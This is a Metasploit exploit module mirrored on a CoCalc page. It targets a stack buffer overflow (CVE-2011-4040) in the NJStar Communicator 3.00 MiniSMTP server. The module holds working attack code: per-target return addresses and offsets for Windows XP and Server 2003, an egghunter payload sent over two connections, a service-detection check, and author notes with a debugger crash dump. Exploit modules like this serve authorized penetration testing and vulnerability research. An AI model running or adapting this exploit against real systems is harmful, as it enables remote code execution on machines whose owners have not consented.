CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smtp/njstar_smtp_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Egghunter

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'NJStar Communicator 3.00 MiniSMTP Buffer Overflow',

15
      'Description'    => %q{

16
        This module exploits a stack buffer overflow vulnerability in NJStar Communicator

17
        Version 3.00 MiniSMTP server.  The MiniSMTP application can be seen in multiple

18
        NJStar products, and will continue to run in the background even if the

19
        software is already shutdown.  According to the vendor's testimonials,

20
        NJStar software is also used by well known companies such as Siemens, NEC,

21
        Google, Yahoo, eBay; government agencies such as the FBI, Department of

22
        Justice (HK); as well as a long list of universities such as Yale, Harvard,

23
        University of Tokyo, etc.

24
      },

25
      'License'        => MSF_LICENSE,

26
      'Author'         =>

27
        [

28
          'Dillon Beresford', # Original discovery and MSF Module.

29
        ],

30
      'References'     =>

31
        [

32
          [ 'OSVDB', '76728' ],

33
          [ 'CVE', '2011-4040' ],

34
          [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],

35
          [ 'EDB', '18057' ]

36
        ],

37
      'DefaultOptions' =>

38
        {

39
          'EXITFUNC' => 'thread',

40
        },

41
      'Platform'       => 'win',

42
      'Payload'        =>

43
        {

44
          'BadChars' => "\x00",

45
          'StackAdjustment' => -1500,

46
        },

47
      'Targets'        =>

48
        [

49
          [

50
            'Windows XP SP2/SP3',

51
            {

52
              'Ret'    => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)

53
              'Offset' => 247,

54
            }

55
          ],

56
          [

57
            # Can't test patch level on this one, because you can't

58
            # even update Win2k3 SP0 anymore from Windows Update

59
            'Windows Server 2003 SP0',

60
            {

61
              'Ret'    => 0x77d20738, # JMP ESP (USER32.dll)

62
              'Offset' => 247,

63
            }

64
          ],

65
          [

66
            'Windows Server 2003 SP1/SP2',

67
            {

68
              'Ret'    => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)

69
              'Offset' => 247,

70
            }

71
          ]

72
        ],

73
      'Privileged'     => false,

74
      'DisclosureDate' => '2011-10-31',

75
      'DefaultTarget'  => 0))

76


77
    register_options([Opt::RPORT(25)])

78
  end

79


80
  def check

81
    connect

82
    # We get a response like: "220 [host-name] Service Ready"

83
    # But we don't really care about this one

84
    res = sock.get_once(-1, 5)

85
    vprint_status("Banner: #{res.to_s.chop}")

86


87
    sock.puts("HELP\r\n")

88


89
    # But the HELP response will tell us if this is a NJStar SMTP or not

90
    res = sock.get_once(-1, 5)

91
    vprint_status("HELP Response: #{res.to_s.chop}")

92
    disconnect

93


94
    # I can only flag it as "Detected" because it doesn't return a version

95
    if res =~ /Windows E-mail Server From NJStar Software/i

96
      return Exploit::CheckCode::Detected

97
    end

98


99
    return Exploit::CheckCode::Safe

100
  end

101


102
  def exploit

103
    eggoptions =

104
    {

105
      :checksum => true,

106
      :eggtag => "w00t"

107
    }

108


109
    hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)

110


111
    buffer = rand_text(target['Offset'])

112
    buffer << [target.ret].pack('V')

113
    buffer << hunter

114
    buffer << make_nops(4)

115


116
    # Just some debugging output so we can see lengths and byte size of each of our buffer.

117
    vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))

118
    vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))

119
    vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

120


121
    print_status("Trying target #{target.name}...")

122


123
    # har har har you get trick no treat...

124
    # we dont have very much space so we

125
    # send our egg in a seperate connection

126
    connect

127


128
    print_status("Sending the egg...")

129
    sock.put(egg)

130


131
    # I think you betta call, ghostbusters...

132
    # now we send our evil buffer along with the

133
    # egg hunter, we are doing multiple connections

134
    # to solve the issue with limited stack space.

135
    # thanks to bannedit for advice on threads and

136
    # making multiple connections to get around

137
    # stack space constraints. :)

138
    connect

139


140
    print_status("Sending our buffer containing the egg hunter...")

141
    sock.put(buffer)

142


143
    handler

144
    disconnect

145
  end

146
end

147


148


149
=begin

150
Dillon Beresford

151
https://twitter.com/#!/D1N

152


153
NJStar Communicator

154
Version: 3.00 and prior

155
Build: 11818 and prior

156


157
Tested minismtp version:

158
1.30.0.60218

159


160
Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,

161
manils, d0tslash, mublix, halsten, and everyone at AHA!

162


163
No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded

164
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability

165
is remotely exploitable and needed more verification. I sent a proof of concept exploit

166
in python with remote code execution. So, here is the proof that the bug is, in fact,

167
remotely exploitable. WIN!

168


169
System DLLs are used for target.ret because minismtp.exe is the only NJStar component in

170
memory, and its base starts with a 0x00, that's no good.  However, if your target machine

171
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator

172
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is

173
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).

174


175
eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50

176
edi=008a3d80

177
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0          nv up ei pl nz na pe nc

178
cs=001b	 ss=0023  ds=0023  es=0023	fs=003b	 gs=0000

179
efl=00010206

180
42424242 ??     ???

181
0:003> !exchain

182
image00400000+bbc4 (0040bbc4)

183
00ccff00: 41414141

184
Invalid exception stack at 41414141

185
0:003> d esp

186
00ccff70  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

187
00ccff80  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

188
00ccff90  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

189
00ccffa0  44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00  DDDD......@. #A.

190
00ccffb0  00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00  ........)..|.=..

191
00ccffc0  00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f  .........=......

192
00ccffd0  00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff  ................

193
00ccffe0  d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00  ...|0..|........

194


195
=end

196


197